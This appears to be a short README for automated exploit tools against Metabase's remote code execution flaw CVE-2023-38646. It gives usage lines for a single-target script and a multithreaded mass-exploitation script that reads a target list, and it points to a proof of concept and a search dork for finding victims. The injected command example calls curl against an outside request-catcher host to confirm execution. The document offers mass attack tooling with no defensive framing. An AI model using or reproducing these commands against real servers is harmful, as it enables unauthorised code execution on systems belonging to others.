Automatic Tools For Metabase RCE Exploit Known As CVE-2023-38646. Read https://secry.me/explore/news/metabase-rce-cve-2023-38646/ for more information (POC, Dork)
python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"
or
python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"
python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt
or
python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"